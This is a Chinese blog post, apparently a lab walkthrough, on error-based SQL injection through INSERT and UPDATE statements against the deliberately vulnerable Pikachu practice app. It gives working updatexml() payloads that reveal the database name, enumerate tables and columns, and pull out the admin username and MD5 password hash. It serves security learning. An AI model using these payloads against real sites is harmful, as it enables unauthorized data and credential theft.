8.SQL注入-基于insert,update利用案例

最新推荐文章于 2024-07-30 09:06:39 发布
最新推荐文章于 2024-07-30 09:06:39 发布
阅读量863 收藏 10
点赞数 18
分类专栏: 网络安全web测试sql注入 文章标签: oracle 数据库 sql注入 基于inset/update
曲云龙
本文链接:https://blog.csdn.net/weixin_46253249/article/details/140011449
版权

SQL注入-基于insert/update利用案例

sql语句正常插入表中的数据

insert into member(username,pw,sex,phonenum,address,email) values('xiaoqiang',1111,1,2,3,4);
select * from member;

例如插入小强数据,如图所示:
在这里插入图片描述

采用or这个运算符,构造闭合语句

values('xiaoqiang' or   or '',1111,1,2,3,4);

‘xiaoqinag’ or __ or 中后面的那个or后的单引号是为了闭合掉语句后面本身带有的单引号。而前面第一个or后是我们要填的注入语句。
这里还是用后台报错的方法来构造payload,且有必要提到的是,这里我们还用的了updatexmal()
在这里插入图片描述

基于insert语句下的报错:
暴库payload语句

xiaoqiang' or updatexml(1,concat(0x7e,database()),0)  or '

爆出数据库:pikachu 如图所示:
在这里插入图片描述

基于insert利用案例(与update是一样的)

通过前端网页进行测试,点击insert注入->注册,必填项输入单引号,看后台会执行报错不
在这里插入图片描述

发现被后台数据执行,返回报错信息sql语句错误
在这里插入图片描述

输入payload爆库语句进行测试,查看结果

xiaoqiang' or updatexml(1,concat(0x7e,database()),0)  or '

发现数据库已经显示pikachu
在这里插入图片描述

输入payload爆表名称语句,也是要加limit参数,一次一次的去测试

xiaoqiang' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)  or '

发现表名称为users比较敏感
在这里插入图片描述

根据已知的表名进行爆列字段的payload语句,一次一次进行测试

xiaoqiang' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),0)  or '

爆出字段用户名username
在这里插入图片描述

爆出字段密码:password
在这里插入图片描述

爆出用户名和密码的payload语句

xiaoqiang' or updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)  or '

发现高级用户admin
在这里插入图片描述

根据已知的表名,用户名,进行爆出密码的payload语句

xiaoqiang' or updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0)  or '

爆出md5值密码,被加密了,可以进行解密,即可;
在这里插入图片描述

基于update利用案例(与insert是一样的)

例如:还是用暴库语句,基于报错:
xiaoqiang’ or updatexml(1,concat(0x7e,database()),0) or ’
登录lucy的账号,进行修改数据,输入payload语句进行暴库
在这里插入图片描述

如果所示,库名被暴漏出来,接下来同上一样的操作,这里就不演示了;
在这里插入图片描述

愿听风成曲
关注
  • 18
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL基础语法(insertupdate、delete)
TINA_JING_LIU的博客
04-10 901
Insert into 语句 (用于向表格中插入新的行/列) 插入新行语法: Insert into 表名 values(值) 例1:学生表中新增一名学生 insert into Student values ("10005","Lilei","11","boy") 插入某列数据语法: Insert into 表名(列名)values(值) 例1:学生表中新增1个学生编号及其姓名 insert into Student(s_id,s_name) values ("10005","Lil
SQL注入各种注入原理|绕过技巧|带实例详解|
没有
03-19 8112
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
SQL注入_insert&delete&update&selete
weixin_48131633的博客
10-26 5021
SQL注入_insert&delete&update&selete
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
无痕渗透“INSERT INTO”型SQL注入
逆水行舟
12-30 2万+
原文链接:http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html 在某个寂静的深夜,你徘徊在一个网站中,其中包含一个可提交form,需要你输入一个昵称。你输入了一个单引号作为你的昵称,网站返回了一条异常信息:“You have an error in your SQL syntax”。机智的你很快明
SQL注入】小白手把手入门SQL注入1-数据库基础
记录并分享学习安全的知识点..
02-18 1140
数据库是“按照数据结构来组织、存储和管理数据的仓库”。是一个长期存储在计算机内的、有组织的、可共享的、统一管理的大量数据的集合。关系型数据库关系型数据库是基于关系模型的数据库系统,使用表格(表)来组织数据。数据以行和列的形式存储在表中,每个表代表一个实体或关系,每一行表示一个数据记录,每一列表示记录的属性。关系型数据库使用结构化查询语言(SQL)进行数据的查询和操作。关系型数据库中表与表之间是有很多复杂的关联关系的常见的关系型数据库有等。非关系型数据库
【SQL Server学习笔记】INSERTUPDATE 语句
weixin_30706507的博客
06-25 239
1、INSERT语句 --通过default关键字显式插入默认值 insert into Production.Location (Name,CostRate,Availability,ModifiedDate) values('Wheel Storage',11.25,80.00, DEFAULT) --如整个表所有列...
2020.9最新-MyBatis视频教程.txt
09-26
在订单管理模块中,可以利用MyBatis的动态SQL功能来实现复杂的订单查询需求。 综上所述,MyBatis作为一款轻量级的持久层框架,不仅功能强大,而且使用简单灵活,非常适合用于快速开发Java Web应用程序。通过对...
在IISSQL+Server中利用ISAPI+ReWrite防SQL注入攻击.pdf
11-23
### 在IIS+SQL Server中利用ISAPI Rewrite防范SQL注入攻击 #### 摘要 本文探讨了在IIS+SQL Server环境下如何有效利用ISAPI Rewrite来预防SQL注入攻击的问题。通过对ISAPI Rewrite的工作原理及配置方法进行详细介绍...
MyBatis Dynamic SQL 动态sql案例.zip
04-28
Mabits的动态SQL还允许开发者使用参数化查询,可以防止SQL注入攻击,并增强程序的安全性 学习经常用的几个标签 2.标签 标签是Mabits动态SQL中最常用的一个标签之一,它的作用是根据给定条件包含或排除不同的部分,以...
insert/update同时执行(mysql,oracle,sqlserver)
12-02
判断是否存在,存在就update,不存在insert,不是用存储过程解决的。
代码审计-Java项目审计-SQL注入漏洞
xiaoheizi的博客
08-16 295
eval assert preg_replace call_user_func call_user_func_array等。extract() parse_str() import_request_variables() $$ 等。$_FILES,type="file",上传,move_uploaded_file()等。$_GET,$_POST,$_REQUEST,$_FILES,$_SERVER等。审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等。
SQL:不存在则insert存在则update
七侠镇莫小贝的同福客栈
03-31 6735
SQL:不存在则insert存在则update 参考资料:http://www.tuicool.com/articles/YR7FNf INSERT INTO arfcns(arfcn,power,type) VALUES('11','22','33')  ON DUPLICATE KEY UPDATE counter=counter+1; 执行update语句的条件是i
SQL注入UPDATEinsert、delete注入
07-08 3384
SQL注入
SQL insertupdate
lealiujj的博客
08-08 2940
基本的语法就不讲了,这里记录下个人使用过程中容易遗忘的步伐: 一、SQL语句insert into数据三种方式 总结: 插入数据格式 1、手动输入插入的值 insert into xx (name,age) values("xxx",23),("yy",23); 2、插入从另外一张表格中查询的值 insert into xxx (name) select names from yy group ...
sql语句之insertupdate
atian1的博客
03-17 894
【代码】sql语句之insertupdate
针对INSERT语句的SQL注入
最新发布
qq_69100706的博客
07-30 544
在CTF(Capture The Flag)竞赛中,针对INSERT语句的SQL注入是一种利用Web应用程序逻辑漏洞的技术,主要发生在应用程序接收用户输入并将其插入到数据库中时。如果应用程序没有正确地清理或参数化这些输入,攻击者可以注入恶意SQL代码,从而操纵数据库插入操作,甚至执行其他SQL命令。
SQL注入——insert注入(pikachu)
W小哥
01-14 3842
第一步:访问目标网站,点击注册 第二步:填写注册内容并使用burpsuite抓取数据包,右键send toRepeater 第三步:数据包不修改,正常发送,返回内容如下所示 第四步:测试注入点 数据包中注册用户username修改,返回页面如下所示 第五步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,concat(0...
《程序员的SQL金典》- 数据库入门与实战指南
第10章则涉及数据库安全,如SQL注入漏洞的防御,SQL性能优化,事务处理,自动增长字段,NULL值的处理,以及开窗函数等进阶话题,这些都是提高数据库效率和安全性的关键知识点。 最后一章,作者通过一个实际案例将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值